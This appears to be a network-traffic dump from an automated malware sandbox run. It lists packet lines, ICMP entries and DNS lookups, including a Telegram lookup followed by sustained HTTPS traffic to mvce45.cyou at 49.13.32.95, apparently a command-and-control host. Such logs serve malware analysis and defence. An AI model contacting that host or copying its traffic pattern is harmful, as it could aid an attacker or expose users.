                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.409630060 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.409630060 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416368961 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416387081 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416440010 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416449070 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416481972 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.416497946 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423393011 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423408985 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423472881 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423472881 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423484087 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.423588991 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.586560965 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.586590052 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.586724043 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.586747885 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.586828947 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593507051 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593529940 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593611956 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593627930 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593664885 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.593790054 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.600589037 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.600608110 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.600694895 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.600708008 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.600784063 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.606698036 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.606720924 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.606802940 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.606810093 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.606873035 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613593102 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613614082 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613688946 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613688946 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613701105 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.613778114 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.620095015 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.620116949 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.620218039 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:00.620235920 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.055267096 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.219464064 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.219494104 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.219682932 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.219696999 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.219794989 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.226310968 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.226334095 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.226413965 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.226422071 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.226524115 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.233167887 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.233191967 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.233463049 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.233469963 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.233863115 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239259005 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239281893 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239331961 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239340067 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239371061 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.239517927 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.246459007 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.246479034 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.246685982 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.246695995 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.246932030 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.252857924 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.252882004 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.253030062 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.253038883 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.253703117 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.259870052 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.259888887 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.260097980 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.260097980 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.260107994 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.261387110 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.266856909 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.266875029 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.266949892 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.266957045 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.266992092 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.430273056 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.430293083 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.430416107 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.430424929 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.430479050 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435638905 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435667992 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435709953 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435714960 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435736895 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435755014 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435775042 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.435813904 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.436091900 CET49834443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:01.436104059 CET4434983449.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:02.130882978 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:02.130916119 CET4434983749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:02.131067038 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:02.131340981 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:02.131350040 CET4434983749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.544358015 CET49838443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.544389009 CET4434983849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.544701099 CET49838443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.544701099 CET49838443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.544732094 CET4434983849.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.635128021 CET4434983749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.635232925 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.635735989 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.635742903 CET4434983749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.637762070 CET49837443192.168.2.849.13.32.95
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.637768984 CET4434983749.13.32.95192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:49:03.637839079 CET49837443192.168.2.849.13.32.95
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.172148943 CET53518051.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:36.174755096 CET53492261.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.092655897 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.309755087 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.409318924 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:38.619003057 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.011176109 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.244709969 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.244754076 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.244767904 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.244826078 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.294485092 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.295357943 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.296981096 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.298998117 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.335216999 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.456381083 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.456398010 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.456475973 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.456614971 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.535797119 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.536401987 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.538186073 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.635364056 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642031908 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642046928 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642056942 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642066002 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642467976 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.642544985 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.646096945 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.649013042 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.674273014 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.674504995 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865230083 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865398884 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865408897 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865436077 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865833998 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.865930080 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:39.979501963 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.005151033 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.182054996 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.211446047 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.310771942 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.310928106 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.628372908 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.652282953 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.675486088 CET44363331162.159.61.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:40.675859928 CET63331443192.168.2.8162.159.61.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.955014944 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.955360889 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.972062111 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.972347975 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.988056898 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:41.988169909 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.290097952 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.291659117 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.292620897 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.293096066 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.317528963 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.319576979 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320595980 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320626974 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320873976 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.320888996 CET44355887172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.321647882 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.322068930 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:42.631370068 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.224086046 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.224210978 CET55887443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.242990017 CET53802443192.168.2.823.44.203.16
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.513159037 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.513843060 CET4435380223.44.203.16192.168.2.8
                                                                                                                                                                                                                                                                                                                  Nov 21, 2024 15:48:43.513923883 CET4435380223.44.203.16192.168.2.8
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Nov 21, 2024 15:48:34.801794052 CET | 192.168.2.8 | 1.1.1.1 | c29c | (Port unreachable) | Destination Unreachable |
| Nov 21, 2024 15:48:35.989897013 CET | 192.168.2.8 | 1.1.1.1 | c243 | (Port unreachable) | Destination Unreachable |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 21, 2024 15:47:49.664091110 CET | 192.168.2.8 | 1.1.1.1 | 0x50f6 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:47:52.051379919 CET | 192.168.2.8 | 1.1.1.1 | 0x13b1 | Standard query (0) | mvce45.cyou | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:17.146729946 CET | 192.168.2.8 | 1.1.1.1 | 0x279 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:17.146850109 CET | 192.168.2.8 | 1.1.1.1 | 0xa213 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:30.672641993 CET | 192.168.2.8 | 1.1.1.1 | 0x3faf | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:30.672931910 CET | 192.168.2.8 | 1.1.1.1 | 0x695f | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:33.412941933 CET | 192.168.2.8 | 1.1.1.1 | 0xd34d | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:33.413132906 CET | 192.168.2.8 | 1.1.1.1 | 0x9e9c | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.631732941 CET | 192.168.2.8 | 1.1.1.1 | 0x1ae3 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.631907940 CET | 192.168.2.8 | 1.1.1.1 | 0xe2de | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.632596016 CET | 192.168.2.8 | 1.1.1.1 | 0x3356 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.632760048 CET | 192.168.2.8 | 1.1.1.1 | 0xdd95 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.654954910 CET | 192.168.2.8 | 1.1.1.1 | 0x21f8 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.655122042 CET | 192.168.2.8 | 1.1.1.1 | 0x1303 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.749192953 CET | 192.168.2.8 | 1.1.1.1 | 0xa54f | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.749413013 CET | 192.168.2.8 | 1.1.1.1 | 0x76fb | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.756046057 CET | 192.168.2.8 | 1.1.1.1 | 0x46bd | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.756198883 CET | 192.168.2.8 | 1.1.1.1 | 0x8418 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.929450035 CET | 192.168.2.8 | 1.1.1.1 | 0xfdda | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:35.929609060 CET | 192.168.2.8 | 1.1.1.1 | 0xb478 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:36.032187939 CET | 192.168.2.8 | 1.1.1.1 | 0x1685 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:36.032330990 CET | 192.168.2.8 | 1.1.1.1 | 0x2a03 | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 21, 2024 15:47:49.908555031 CET | 1.1.1.1 | 192.168.2.8 | 0x50f6 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:47:52.587873936 CET | 1.1.1.1 | 192.168.2.8 | 0x13b1 | No error (0) | mvce45.cyou | | 49.13.32.95 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:17.286825895 CET | 1.1.1.1 | 192.168.2.8 | 0x279 | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:17.286850929 CET | 1.1.1.1 | 192.168.2.8 | 0xa213 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false |
| Nov 21, 2024 15:48:30.912483931 CET | 1.1.1.1 | 192.168.2.8 | 0x695f | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:30.916830063 CET | 1.1.1.1 | 192.168.2.8 | 0x3faf | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:31.370450020 CET | 1.1.1.1 | 192.168.2.8 | 0x88ca | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:31.370450020 CET | 1.1.1.1 | 192.168.2.8 | 0x88ca | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false |
| Nov 21, 2024 15:48:31.472835064 CET | 1.1.1.1 | 192.168.2.8 | 0x56d1 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 21, 2024 15:48:33.647730112 CET | 1.1.1.1 | 192.168.2.8 | 0x9e9c | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false |
